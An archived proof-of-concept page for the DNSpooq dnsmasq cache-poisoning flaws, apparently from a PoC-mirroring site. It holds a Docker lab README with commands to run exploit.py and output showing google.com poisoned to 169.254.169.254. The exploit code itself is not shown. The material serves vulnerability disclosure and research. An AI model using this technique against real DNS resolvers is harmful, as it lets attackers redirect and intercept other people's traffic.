Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-25686 PoC — Dnsmasq 安全特征问题漏洞

Source
https://github.com/knqyf263/dnspooq
Associated Vulnerability
Title:Dnsmasq 安全特征问题漏洞 (CVE-2020-25686)
Description:Dnsmasq是一款使用C语言编写的轻量级DNS转发和DHCP、TFTP服务器。 Dnsmasq 存在安全特征问题漏洞,该漏洞源于不会检查现有的同名待处理请求,并转发一个新的请求,从而允许攻击者执行一个“生日攻击”场景来伪造应答,并可能破坏DNS缓存。
Description
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)
Readme
# dnspooq
DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

For educational purposes only



## Requirements
- Docker compose
- Docker

## Exploit

![dnspooq](imgs/dnspooq.png)

### Launch containers

```
$ docker-compose up -d
```

### Run exploit.py

```
$ docker-compose exec attacker bash
bash-5.0# python exploit.py
Querying non-cached names...
Generating spoofed packets...
Poisoned: b'google.com.' => 169.254.169.254
sent 3032017 responses in 50.309 seconds
```

### View output from forwarder container

```
$ docker-compose logs -f forwarder
...
forwarder_1  | dnsmasq[1]: query[A] example.com from 10.10.0.3
forwarder_1  | dnsmasq[1]: forwarded example.com to 10.10.0.4
forwarder_1  | dnsmasq[1]: cached example.com is <CNAME>
forwarder_1  | dnsmasq[1]: cached google.com is 169.254.169.254
```

### View output from cache container

```
$ docker-compose logs -f cache
Attaching to dnspooq_cache_1
cache_1      | Sniffing...
cache_1      | Source port: 46816, TXID: 16476, Query: b'example.com.'
cache_1      | Source port: 16718, TXID: 54280, Query: b'example.com.'
...
cache_1      | Source port: 46816, TXID: 56240, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 24160, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 18189, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 40361, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 13100, Query: b'example.com.'
cache_1      | Source port: 46816, TXID: 47303, Query: b'example.com.'
```

## Reference
- https://www.jsof-tech.com/disclosures/dnspooq/
- https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf

## Author
Teppei Fukuda
File Snapshot

 [4.0K]  /data/pocs/3e91595690b44c8e218151ab79790a27ef70c616
├── [4.0K]  attacker
│   ├── [ 118]  Dockerfile
│   └── [2.3K]  exploit.py
├── [4.0K]  cache
│   ├── [ 126]  Dockerfile
│   └── [ 308]  sniff.py
├── [4.0K]  dnsmasq
│   ├── [  41]  dnsmasq.conf
│   └── [ 522]  Dockerfile
├── [ 677]  docker-compose.yml
├── [4.0K]  imgs
│   └── [236K]  dnspooq.png
├── [ 11K]  LICENSE
└── [1.7K]  README.md

4 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.